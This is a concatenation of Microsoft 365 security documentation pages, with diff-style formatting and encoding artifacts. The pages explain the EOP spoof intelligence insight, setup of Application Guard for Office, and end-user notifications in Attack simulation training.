- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Spoof intelligence insight in EOP
--
-In Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, inbound email messages are automatically protected against spoofing. EOP uses **spoof intelligence** as part of your organization's overall defense against phishing. For more information, see [Anti-spoofing protection in EOP](anti-phishing-protection-spoofing-about.md).
-
-When a sender spoofs an email address, they appear to be a user in one of your organization's domains, or a user in an external domain that sends email to your organization. Attackers who spoof senders to send spam or phishing email need to be blocked. But there are scenarios where legitimate senders are spoofing. For example:
--- Legitimate scenarios for spoofing internal domains:
- - Third-party senders use your domain to send bulk mail to your own employees for company polls.
- - An external company generates and sends advertising or product updates on your behalf.
- - An assistant regularly needs to send email for another person within your organization.
- - An internal application sends email notifications.
--- Legitimate scenarios for spoofing external domains:
- - The sender is on a mailing list (also known as a discussion list), and the mailing list relays email from the original sender to all the participants on the mailing list.
- - An external company sends email on behalf of another company (for example, an automated report or a software-as-a-service company).
-
-You can use the *spoof intelligence insight* in the Microsoft Defender portal to quickly identify spoofed senders who are legitimately sending you unauthenticated email (messages from domains that don't pass SPF, DKIM, or DMARC checks), and manually allow those senders.
-
-By allowing known senders to send spoofed messages from known locations, you can reduce false positives (good email marked as bad). By monitoring the allowed spoofed senders, you provide an additional layer of security to prevent unsafe messages from arriving in your organization.
-
-Likewise, you can use the spoof intelligence insight to review spoofed senders that were allowed by spoof intelligence and manually block those senders.
-
-The rest of this article explains how to use the spoof intelligence insight in the Microsoft Defender portal and in PowerShell (Exchange Online PowerShell for Microsoft 365 organizations with mailboxes in Exchange Online; standalone EOP PowerShell for organizations without Exchange Online mailboxes).
-
-> [!NOTE]
->
-> - Only spoofed senders that were detected by spoof intelligence appear in the spoof intelligence insight. When you override the allow or block verdict in the insight, the spoofed sender becomes a manual allow or block entry that appears only on the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page at <https://security.microsoft.com/tenantAllowBlockList?viewid=SpoofItem>. You can also manually create allow or block entries for spoofed senders before they're detected by spoof intelligence. For more information, see [Spoofed senders in the Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md#spoofed-senders-in-the-tenant-allowblock-list).
->
-> - The **Action** values **Allow** or **Block** in the spoof intelligence insight refer to spoof _detection_ (whether Microsoft 365 identified the message as spoofed or not). The **Action** value doesn't necessarily affect the overall filtering of the message. For example, to avoid false positives, a spoofed message might be delivered if we find that it doesn't have malicious intent.
->
-> - The spoof intelligence insight and the **Spoofed senders** tab in the Tenant Allow/Block list replace the functionality of the spoof intelligence policy that was available on the anti-spam policy page in the Security & Compliance Center.
->
-> - The spoof intelligence insight shows 7 days worth of data. The **Get-SpoofIntelligenceInsight** cmdlet shows 30 days worth of data.
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList?viewid=SpoofItem>. To go directly to the **Spoof intelligence insight** page, use <https://security.microsoft.com/spoofintelligence>.--- To connect to Exchange Online PowerShell, see [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell). To connect to standalone EOP PowerShell, see [Connect to Exchange Online Protection PowerShell](/powershell/exchange/connect-to-exchange-online-protection-powershell).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Exchange Online permissions](/exchange/permissions-exo/permissions-exo):
- - _Allow or block spoofed senders or turn on or turn off spoof intelligence_: Membership in one of the following role groups:
- - **Organization Management**
- - **Security Administrator** <u>and</u> **View-Only Configuration** or **View-Only Organization Management**.
- - _Read-only access to the spoof intelligence insight_: Membership in the **Global Reader**, **Security Reader**, or **View-Only Organization Management** role groups.
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Global Reader**, or **Security Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- For our recommended settings for anti-phishing policies, see [EOP anti-phishing policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-phishing-policy-settings).--- You enable and disable spoof intelligence in anti-phishing policies in EOP and Microsoft Defender for Office 365. Spoof intelligence is enabled by default. For more information, see [Configure anti-phishing policies in EOP](anti-phishing-policies-eop-configure.md) or [Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md).--- For our recommended settings for spoof intelligence, see [EOP anti-phishing policy settings](recommended-settings-for-eop-and-office365.md#eop-anti-phishing-policy-settings).-
-## Find the spoof intelligence insight in the Microsoft Defender portal
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Tenant Allow/Block Lists** in the **Rules** section. Or, to go directly to the **Tenant Allow/Block Lists** page, use <https://security.microsoft.com/tenantAllowBlockList>.
-
-2. Select the **Spoofed senders** tab.
-
-3. On the **Spoofed senders** tab, the spoof intelligence insight looks like this:
-
- :::image type="content" source="../../media/m365-sc-spoof-intelligence-insight.png" alt-text="The Spoof intelligence insight on the Anti-phishing policy page" lightbox="../../media/m365-sc-spoof-intelligence-insight.png":::
-
- The insight has two modes:
-
- - **Insight mode**: If spoof intelligence is enabled, the insight shows you how many messages were detected by spoof intelligence during the past seven days.
- - **What if mode**: If spoof intelligence is disabled, then the insight shows you how many messages *would have been* detected by spoof intelligence during the past seven days.
-
-To view information about the spoof intelligence detections, select **View spoofing activity** in the spoof intelligence insight to go to the **Spoof intelligence insight** page.
-
-### View information about spoof detections
-
-> [!NOTE]
-> Remember, only spoofed senders that were detected by spoof intelligence appear on this page.
-
-The **Spoof intelligence insight** page at <https://security.microsoft.com/spoofintelligence> is available when you select **View spoofing activity** from the spoof intelligence insight on the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page.
-
-On the **Spoof intelligence insight** page, you can sort the entries by clicking on an available column header. The following columns are available:
--- **Spoofed user**: The **domain** of the spoofed user that's displayed in the **From** box in email clients. The From address is also known as the `5322.From` address.-- **Sending infrastructure**: Also known as the _infrastructure_. The sending infrastructure is one of the following values:
- - The domain found in a reverse DNS lookup (PTR record) of the source email server's IP address.
- - If the source IP address has no PTR record, then the sending infrastructure is identified as \<source IP\>/24 (for example, 192.168.100.100/24).
- - A verified DKIM domain.
-- **Message count**: The number of messages from the combination of the spoofed domain _and_ the sending infrastructure to your organization within the last seven days.-- **Last seen**: The last date when a message was received from the sending infrastructure that contains the spoofed domain.-- **Spoof type**: One of the following values:
- - **Internal**: The spoofed sender is in a domain that belongs to your organization (an [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains)).
- - **External**: The spoofed sender is in an external domain.
-- **Action**: This value is **Allowed** or **Blocked**:
- - **Allowed**: The domain failed explicit email authentication checks [SPF](email-authentication-spf-configure.md), [DKIM](email-authentication-dkim-configure.md), and [DMARC](email-authentication-dmarc-configure.md). However, the domain passed our implicit email authentication checks ([composite authentication](email-authentication-about.md#composite-authentication)). As a result, no anti-spoofing action was taken on the message.
- - **Blocked**: Messages from the combination of the spoofed domain _and_ sending infrastructure are marked as bad by spoof intelligence. The action that's taken on the spoofed messages with malicious intent is controlled by the [Standard or Strict preset security policies](preset-security-policies.md), the default anti-phishing policy, or custom anti-phishing policies. For more information, see [Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md).
-
-To change the list of spoofed senders from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-To filter the entries, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: **Filter**. The following filters are available in the **Filter** flyout that opens:
--- **Spoof type**: The available values are **Internal** and **External**.-- **Action**: The available values are **Allow** and **Block**-
-When you're finished in the **Filter** flyout, select **Apply**. To clear the filters, select :::image type="icon" source="../../media/m365-cc-sc-clear-filters-icon.png" border="false"::: **Clear filters**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific entries.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of spoof detections to a CSV file.
-
-### View details about spoof detections
-
-When you select a spoof detection from the list by clicking anywhere in the row other than the check box next to the first column, a details flyout opens that contains the following information:
--- **Why did we catch this?** section: Why we detected this sender as spoof, and what you can do for further information.-- **Domain summary** section: Includes the same information from the main **Spoof intelligence insight** page.-- **WhoIs data** section: Technical information about the sender's domain.-- **Explorer investigation** section: In Defender for Office 365 organization, this section contains a link to open [Threat Explorer](threat-explorer-real-time-detections-about.md) to see additional details about the sender on the **Phish** tab.-- **Similar Emails** section: Contains the following information about the spoof detection:
- - **Date**
- - **Subject**
- - **Recipient**
- - **Sender**
- - **Sender IP**
-
- Select **Customize columns** to remove the columns that are shown. When you're finished, select **Apply**.
-
-> [!TIP]
-> To see details about other entries without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-To change the spoof detection from **Allow** to **Block** or vice-versa, see the next section.
-
-### Override the spoof intelligence verdict
-
-On the **Spoof intelligence insight** page at <https://security.microsoft.com/spoofintelligence>, use either of the following methods to override the spoof intelligence verdict:
--- Select one or more entries from the list by selecting the check box next to the first column.
- 1. Select the :::image type="icon" source="../../media/m365-cc-sc-bulk-actions-icon.png" border="false"::: **Bulk actions** action that appears.
- 2. In the **Bulk actions** flyout that opens, select **Allow to spoof** or **Block from spoofing**, and then select **Apply**.
--- Select the entry from the list by clicking anywhere in the row other than the check box.-
- In the details flyout that opens, select **Allow to spoof** or **Block from spoofing** at the top of the flyout, and then select **Apply**.
-
-Back on the **Spoof intelligence insight** page, the entry is removed from the list, and is added to the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page at <https://security.microsoft.com/tenantAllowBlockList?viewid=SpoofItem>.
-
-### About allowed spoofed senders
-
-Messages from an allowed spoofed sender (automatically detected or manually configured) are allowed only using the combination of the spoofed domain *and* the sending infrastructure. For example, the following spoofed sender is allowed to spoof:
--- **Domain**: gmail.com-- **Infrastructure**: tms.mx.com-
-Only email from that domain/sending infrastructure pair is allowed to spoof. Other senders attempting to spoof gmail.com aren't automatically allowed. Messages from senders in other domains that originate from tms.mx.com are still checked by spoof intelligence, and might be blocked.
-
-## Use the spoof intelligence insight in Exchange Online PowerShell or standalone EOP PowerShell
-
-In PowerShell, you use the **Get-SpoofIntelligenceInsight** cmdlet to *view* allowed and blocked spoofed senders that were detected by spoof intelligence. To manually allow or block the spoofed senders, you need to use the **New-TenantAllowBlockListSpoofItems** cmdlet. For more information, see [Use PowerShell to create allow entries for spoofed senders in the Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md#use-powershell-to-create-allow-entries-for-spoofed-senders-in-the-tenant-allowblock-list) and [Use PowerShell to create block entries for spoofed senders in the Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md#use-powershell-to-create-block-entries-for-spoofed-senders-in-the-tenant-allowblock-list).
-
-To view the information in the spoof intelligence insight, run the following command:
-
-```powershell
-Get-SpoofIntelligenceInsight
-```
-
-For detailed syntax and parameter information, see [Get-SpoofIntelligenceInsight](/powershell/module/exchange/get-spoofintelligenceinsight).
-
-## Other ways to manage spoofing and phishing
-
-Be diligent about spoofing and phishing protection. Here are related ways to check on senders who are spoofing your domain and help prevent them from damaging your organization:
--- Check the **Spoof Mail Report**. Use this report often to view and help manage spoofed senders. For information, see [Spoof Detections report](reports-email-security.md#spoof-detections-report).--- Review your SPF, DKIM, and DMARC configuration. For more information, see the following articles:
- - [Email authentication in Microsoft 365](email-authentication-about.md)
- - [Set up SPF to help prevent spoofing](email-authentication-spf-configure.md)
- - [Use DKIM to validate outbound email sent from your custom domain](email-authentication-dkim-configure.md)
- - [Use DMARC to validate email](email-authentication-dmarc-configure.md)
- - [Configure trusted ARC sealers](email-authentication-arc-configure.md)
security App Guard For Office Install https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/app-guard-for-office-install.md
- Title: Application Guard for Office for admins
- - NOCSH
----
- - MET150
- - MOE150
--- m365-security-- tier3
-description: Get the latest in hardware-based isolation. Prevent current and emerging attacks like exploits or malicious links from disrupting employee productivity and enterprise security.
- Previously updated : 11/27/2023--
-# Application Guard for Office for admins
-
-**Applies to:** Word, Excel, and PowerPoint for Microsoft 365 Apps, Windows 10 Enterprise, Windows 11 Enterprise
-
-> [!IMPORTANT]
-> Microsoft Defender Application Guard for Office is being deprecated and is no longer being updated. This deprecation also includes the [Windows.Security.Isolation APIs](/uwp/api/windows.security.isolation) that are used for Microsoft Defender Application Guard for Office. We recommend transitioning to Microsoft Defender for Endpoint [attack surface reduction rules](../defender-endpoint/overview-attack-surface-reduction.md) along with [Protected View](recommended-settings-for-eop-and-office365.md#global-settings-for-safe-attachments) and [Windows Defender Application Control](/windows/security/application-security/application-control/windows-defender-application-control/wdac).
-
-Microsoft Defender Application Guard for Office (Application Guard for Office) helps prevent untrusted files from accessing trusted resources, keeping your enterprise safe from new and emerging attacks. This article walks admins through setting up supported devices for Application Guard for Office.
-
-## Prerequisites
-
-### Licensing requirements
--- Microsoft 365 E5 or Microsoft 365 E5 Security-- [Safe Documents in Microsoft 365](safe-documents-in-e5-plus-security-about.md)-
-### Minimum hardware requirements
--- **CPU**: 64-bit, four cores (physical or virtual), virtualization extensions (Intel VT-x OR AMD-V), Core i5 equivalent or higher recommended.-- **Physical memory**: 8 GB of RAM.-- **Hard disk**: 10 GB of free space on the system drive (SSD recommended).-
-### Minimum software requirements
--- **Windows**: Windows 10 Enterprise edition, Client Build version 2004 (20H1) build 19041 or later. All versions of Windows 11 are supported.-- **Office**: Microsoft 365 Apps with build 16.0.13530.10000 or later. For Current Channel and Monthly Enterprise Channel installations, this version is equivalent to 2011. For Semi-Annual Enterprise Channel and Semi-Annual Enterprise Channel (Preview), the minimum version is 2108 or later. Both 32-bit and 64-bit versions are supported.-- **Update package**: Windows 10 cumulative monthly security update [KB4571756](https://support.microsoft.com/help/4571756/windows-10-update-KB4571756)-
-For detailed system requirements, refer to [System requirements for Microsoft Defender Application Guard](/windows/security/threat-protection/microsoft-defender-application-guard/reqs-md-app-guard). Also, refer to your computer manufacturer's guides on how to enable virtualization technology.
-To learn more about Microsoft 365 Apps update channels, see [Overview of update channels for Microsoft 365 Apps](/deployoffice/overview-update-channels).
-
-## Deploy Application Guard for Office
-
-### Enable Application Guard for Office
-
-1. Operating system requirements:
- - **Windows 10**: Verify [September 8. 2020 KB4571756](https://support.microsoft.com/topic/b7de4a66-00ce-c620-ab48-b4e3a89954ed) is installed.
- - **Windows 11**: No specific requirements.
-
-2. In **Windows Features**, select **Microsoft Defender Application Guard**, and then select **OK**. Enabling the Application Guard feature prompts for a system reboot. You can reboot now or after step 3.
-
- :::image type="content" source="../../media/ag03-deploy.png" alt-text="The Windows Features dialog box showing AG" lightbox="../../media/ag03-deploy.png":::
-
- You can also enable Application Guide in Windows PowerShell by running the following command as an administrator:
-
- ```powershell
- Enable-WindowsOptionalFeature -Online -FeatureName Windows-Defender-ApplicationGuard
- ```
-
-3. In **Group Policy Editor**, go to **Computer Configuration** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Application Guard**.
-
- Enable the **Turn on Microsoft Defender Application Guard in Managed Mode** setting. Set the value in the **Options** section to either of the following values:
-
- - **2**: Enable Microsoft Defender Application Guard for isolated Windows environments ONLY.
- - **3**: Enable Microsoft Defender Application Guard for Microsoft Edge AND isolated Windows environments.
-
- :::image type="content" source="../../media/ag04-deploy.png" alt-text="The option to turn on AG in Managed Mode" lightbox="../../media/ag04-deploy.png":::
-
- Alternatively, you can set the corresponding CSP policy:
-
- > OMA-URI: **./Device/Vendor/MSFT/WindowsDefenderApplicationGuard/Settings/AllowWindowsDefenderApplicationGuard**
- > Data type: **Integer**
- > Value: **2**
-
-4. Restart the computer, if you haven't already.
-
-### Set Diagnostics & feedback to send full data
-
-> [!NOTE]
-> This step isn't required. However, configuring optional diagnostics data can help diagnose reported issues.
-
-This step ensures that the data necessary to identify and fix problems is reaching Microsoft. Follow these steps to enable diagnostics on your Windows device:
-
-1. Open **Settings** from the Start menu.
-2. On **Windows Settings**, select **Privacy**.
-3. Under Privacy, select **Diagnostics & feedback** and select **Optional diagnostic data**.
-
-For more on configuring Windows diagnostic settings, refer to [Configuring Windows diagnostic data in your organization](/windows/privacy/configure-windows-diagnostic-data-in-your-organization#enterprise-management).
-
-### Confirm that Application Guard for Office is enabled and working
-
-Before confirming that Application Guard for Office is enabled, do the following steps:
-
-1. Launch Word, Excel, or PowerPoint on a device where the policies have been deployed.
-2. From the app you launched, go to **File** \> **Account**. On the **Account** page, verify that the expected license is shown.
-
-To confirm that Application Guard for Office is enabled, open an untrusted document. For example, you can open a document that was downloaded from the internet or an email attachment from someone outside your organization.
-
-When you first open an untrusted file, the following Office splash screen is shown. Application Guard for Office is being activated and the file is being opened. Subsequent openings of untrusted files are typically faster.
--
-After the file opens, there are a few visual indicators that signal that the file is open inside Application Guard for Office:
--- A callout in the ribbon-
- :::image type="content" source="../../media/ag09-confirm.png" alt-text="The Doc file showing small App Guard note" lightbox="../../media/ag09-confirm.png":::
--- The application icon with a shield in the taskbar-
- :::image type="icon" source="../../media/ag12-limitations.png" border="false":::
-
-## Configure Application Guard for Office
-
-Office supports the following policies to configure Application Guard for Office. These policies can be configured through group policies or through the [Office cloud policy service](/DeployOffice/overview-office-cloud-policy-service).
-
-> [!NOTE]
-> Configuring these policies can disable some functionality for files opened in Application Guard for Office.
-
-|Policy|Description|
-|||
-|Don't use Application Guard for Office|Forces Word, Excel, and PowerPoint to use the Protected View isolation container instead of Application Guard for Office.|
-|Configure Application Guard for Office container precreation|Determines if the Application Guard for Office container is precreated for improved run-time performance. When you enable this policy, you can specify the number of days to continue precreating a container or let the Office built-in heuristic precreate the container.
-|Configure copy and paste from Office documents opened in Application Guard|Allows you to control whether users can copy and paste content from Office to and from documents opened in Application Guard, as well as the allowed formats.|
-|Disable hardware acceleration in Application Guard for Office|Controls whether Application Guard for Office uses hardware acceleration to render graphics. If you enable this setting, Application Guard for Office uses software-based (CPU) rendering and doesn't load any third-party graphics drivers or interact with any connected graphics hardware.
-|Disable unsupported file types protection in Application Guard for Office|Controls whether Application Guard for Office blocks unsupported file types from being opened or if it enables redirection to Protected View.
-|Turn off camera and microphone access for documents opened in Application Guard for Office|Enabling this policy removes Office access to the camera and microphone inside Application Guard for Office.|
-|Restrict printing from documents opened in Application Guard for Office|Limits the printers that a user can print to from a file opened in Application Guard for Office. For example, you can use this policy to restrict users to only print to PDF.|
-|Prevent users from removing Application Guard for Office protection on files|Removes the option (within the Office application experience) to disable Application Guard for Office protection or to open a file outside Application Guard for Office. <br/><br/> **Note:** Users can still bypass this policy by manually removing the mark-of-the-web property from the file or by moving a document to a trusted location.|
-
-> [!NOTE]
-> For the following policies to take effect, users are required to sign out of Windows and sign in again:
->
-> - Configure copy and paste from Office documents opened in Application Guard.
-> - Disable hardware acceleration in Application Guard for Office.
-> - Restrict printing for documents opened in Application Guard for Office.
-> - Turn off camera and microphone access to documents opened in Application Guard for Office.
-
-## Submit feedback
-
-### Submit feedback via Feedback Hub
-
-If you encounter any issues when launching Application Guard for Office, you're encouraged to submit your feedback via Feedback Hub:
-
-1. Open the **Feedback Hub app** and sign in.
-2. If you get an error dialog while launching Application Guard, select **Report to Microsoft** in the error dialog to start a new feedback submission. Otherwise, navigate to <https://aka.ms/mdagoffice-fb> to select the correct category for Application Guard, then select **Add new feedback** near the top right.
-3. Enter a summary in the **Summarize your feedback** box.
-4. Enter a detailed description of the issue and the steps you took to debug in the **Explain in more detail** box, then select **Next**.
-5. Select the bubble next to **Problem**. Make sure the category selected is **Security and Privacy \> Microsoft Defender Application Guard ΓÇô Office**, then select **Next**.
-6. Select **New feedback**, then **Next**.
-7. Collect traces about the issue:
- 1. Expand the **Recreate my problem** tile.
- 2. If the issue you're experiencing occurs while Application Guard is running, open an Application Guard instance. Opening an instance allows additional traces to be collected from within the Application Guard container.
- 3. Select **Start recording**, and wait for the tile to stop spinning and say *Stop recording*.
- 4. Fully reproduce the issue with Application Guard. Reproduction might include attempting to launch an Application Guard instance and waiting until it fails, or reproducing an issue in a running Application Guard instance.
- 5. Select the **Stop recording** tile.
- 6. Keep any running Application Guard instance(s) open, even for a few minutes after submission, so that container diagnostics can also be collected.
-8. Attach any relevant screenshots or files related to the problem.
-9. Select **Submit**.
-
-### Submit feedback via One Customer Voice
-
-You can also submit feedback from within Word, Excel, and PowerPoint if the issue happens when files are opened in Application Guard. Refer to [Provide feedback](https://insider.office.com/handbook#Provide-feedback) for detailed guidance.
-
-## Integration with Microsoft Defender for Endpoint and Microsoft Defender for Office 365
-
-Application Guard for Office is integrated with Microsoft Defender for Endpoint to provide monitoring and alerting on malicious activity that happens in the isolated environment.
-
-[Safe Documents in Microsoft E365 E5](safe-documents-in-e5-plus-security-about.md) is a feature that uses Microsoft Defender for Endpoint to scan documents opened in Application Guard for Office. For an additional layer of protection, users can't leave Application Guard for Office until the results of the scan have been determined.
-
-## Limitations and considerations
--- Application Guard for Office is a protected mode that isolates untrusted documents so that they can't access trusted corporate resources. For example, an intranet, the user's identity, and arbitrary files on the computer. If a user tries an action that requires access to trusted resources (for example, inserting a local picture file), the action fails and displays a prompt like the following example. To enable an untrusted document to access trusted resources, users must remove Application Guard protection from the document.-
- :::image type="content" source="../../media/ag09-confirm.png" alt-text="The Dialog box stating safety message and the feature status" lightbox="../../media/ag09-confirm.png":::
-
- > [!NOTE]
- > Advise users to remove protection only if they trust the file and the source of the file.
--- Active content like macros and ActiveX controls are disabled in Application Guard for Office. To enable active content, the Application Guard protection must be removed.--- Untrusted files from network shares or files shared from OneDrive, OneDrive for Business, or SharePoint Online open as read-only in Application Guard. Users can save a local copy of such files to continue working in the container or remove protection to directly work with the original file.--- Files that are protected by Information Rights Management (IRM) are blocked by default. If users want to open such files in Protected View, an administrator must configure policy settings for unsupported file types for the organization.--- Any customizations to Office applications in Application Guard for Office don't persist after a user signs out and signs in again or after the device restarts.--- Only Accessibility tools that use the UIA framework can provide an accessible experience for files opened in Application Guard for Office.--- Network connectivity is required for the first launch of Application Guard after installation.--- In the document's info section, the *Last Modified By* property might display **WDAGUtilityAccount** as the user. WDAGUtilityAccount is the anonymous account used by Application Guard. The desktop user's identity isn't available inside the Application Guard container.-
-## Performance optimizations for Application Guard for Office
-
-Application Guard uses a virtualized container, similar to a virtual machine, to isolate untrusted documents away from the system. The process of creating a container and setting up the Application Guard container to open Office documents has a performance overhead that might negatively affect user experience when users open an untrusted document.
-
-To provide users with the expected file-opening experience, Application Guard uses logic to precreate a container when the following heuristic is met on a system: A user has opened a file in either Protected View or Application Guard in the past 28 days.
-
-When this heuristic is met, Office precreates an Application Guard container for the user after they sign in to Windows. While this precreate operation is in progress, the system might experience slow performance, but the effect resolves as soon as the operation completes.
-
-> [!NOTE]
-> The hints needed for the heuristic to pre-create the container are generated by Office applications as a user uses them. If a user installs Office on a new system where Application Guard is enabled, Office doesn't pre-create the container until after the first time a user opens an untrusted document on the system. This first file takes longer to open in Application Guard.
-
-## Known issues
--- The default setting for the unsupported file types protection policy is to block opening untrusted, unsupported file types that are encrypted or have Information Rights Management (IRM) set. This setting includes files that are encrypted by using sensitivity labels from Microsoft Purview Information Protection.-- HTML files aren't supported at this time.-- Application Guard for Office currently doesn't work with NTFS compressed volumes. If you see the error: "ERROR_VIRTUAL_DISK_LIMITATION" try uncompressing the volume.-- If you see an error mentioning that the hypervisor might not be enabled, check the following items:
- - Virtualization is enabled in the BIOS.
- - Hyper-V is turned on.
- - The Host Network Service is running.
-- Updates to .NET might cause files to fail to open in Application Guard. You can resolve this issue by restarting the machine.-- Application Guard requires "Virtual Machines" to be granted "Logon as a service" permission, and "wdagutilityaccount" must **not** be added to the "Deny logon as a service" security policy setting.-- For more information, see [Frequently asked questions - Microsoft Defender Application Guard for additional information](/windows/security/threat-protection/microsoft-defender-application-guard/faq-md-app-guard).
security Attack Simulation Training End User Notifications https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-end-user-notifications.md
- Title: End-user notifications for Attack simulation training------
- - m365-security
- - tier2
-description: Admins can learn how to create end-user notification email messages for Attack simulation training in Microsoft Defender for Office 365 Plan 2.
Previously updated : 3/11/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# End-user notifications for Attack simulation training
--
-In Attack simulation training in Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2, end-user notifications are email messages that are sent to users as a result of [simulations](attack-simulation-training-simulations.md) or [simulation automations](attack-simulation-training-simulation-automations.md). The following types of end-user notifications are available:
--- **Positive reinforcement notification**: Sent when users report a simulated phishing message.-- **Simulation notification**: Sent when users are included in a simulation or simulation automation, but no trainings are selected.-- **Training assignment notification**: Sent when users are assigned required trainings as a result of a simulation or simulation automations.-- **Training reminder notification**: Sent as reminders for required trainings.-
-To see the available end-user notifications, open the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Content library** tab \> and then select **End user notifications**. To go directly to the **Content library** tab where you can select **End user notifications**, use <https://security.microsoft.com/attacksimulator?viewid=contentlibrary>.
-
-**End user notifications** in the **Content library** tab has two tabs:
--- **Global notifications**: Contains the built-in, unmodifiable notifications.-- **Tenant notifications**: Contains the custom notifications that you created.-
-The following information is shown for each notification. You can sort the notifications by clicking on an available column header. Select :::image type="icon" source="../../media/m365-cc-sc-customize-icon.png" border="false"::: **Customize columns** to change the columns that are shown. By default, all available columns are selected.
--- **Notifications**: The name of the notification.-- **Γï«** (**Actions** control): Take action on the notification. The available actions depend on the **Status** value of the notification as described in the procedure sections.-- **Language**: If the notification contains multiple translations, the first two languages are shown directly. To see the remaining languages, hover over the numeric icon (for example, **+10**).-- **Type**: The value is **Positive reinforcement notification**, **Simulation notification**, **Training assignment notification**, or **Training reminder notification**.-- **Source**: For built-in notifications, the value is **Global**. For custom notifications, the value is **Tenant**.-- **Status**: The value is **Ready** or **Draft**. On the **Global notifications** tab, the value is always **Ready**.-- **Linked simulations**: The total number of [simulations](attack-simulation-training-simulations.md) or [simulation automations](attack-simulation-training-simulation-automations.md) that use the notification.-- **Created by**: For built-in notifications, the value is **Microsoft**. For custom notifications, the value is the user principal name (UPN) of the user who created the notification.-- **Created time**-- **Modified by**-- **Last modified time**-
-> [!TIP]
-> To see all columns, you likely need to do one or more of the following steps:
->
-> - Horizontally scroll in your web browser.
-> - Narrow the width of appropriate columns.
-> - Remove columns from the view.
-> - Zoom out in your web browser.
->
-> The **Γï«** (**Actions** control) is associated with the **Notifications** column. If you remove that column from view, the **Γï«** control goes away.
-
-To find a notification in the list, type part of the notification name in the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and then press the ENTER key.
-
-To group the notifications by type, select :::image type="icon" source="../../media/m365-cc-sc-group-icon.png" border="false"::: **Group** and then select **Notification type**. To ungroup the notifications, select **None**.
-
-On the **Tenant notifications** tab only, select :::image type="icon" source="../../media/m365-cc-sc-filter-icon.png" border="false"::: to filter the notifications by one or more languages.
-
-When you select a notification from the list, a details flyout appears with the following information:
--- **Preview** tab: View the notification message as users see it. To view the message in different languages, use the **Select notification language** dropdown list.-- **Details** tab: View details about the notification:
- - **Notification description**
- - **Source**: For built-in notifications, the value is **Global**. For custom notifications, the value is **Tenant**.
- - **Notification type**
- - **Modified by**
- - **Last modified**
- - **Active training campaigns and phishing simulations**
- - **Name**
- - **Type**
- - **Status**
- - **End by**
-
-On the details flyout from the **Tenant notifications** tab only, select **Edit notification** to modify the notification.
-
-> [!TIP]
-> To see details about other notifications without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-## Create end-user notifications
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Attack simulation training** \> **Content library** tab \> **End user notifications** \> and then select the **Tenant notifications** tab. To go directly to the **Content library** tab where you can select **End user notifications**, use <https://security.microsoft.com/attacksimulator?viewid=contentlibrary>.
-
-2. On the **Tenant notifications** tab, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create new** to start the new end-user notification wizard.
-
- > [!NOTE]
- > At any point after you name the notification during the new end-user notification wizard, you can select **Save and close** to save your progress and continue later. The incomplete notification has the **Status** value **Draft**. You can pick up where you left off by selecting the end-user notification from the list and then clicking the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action that appears.
- >
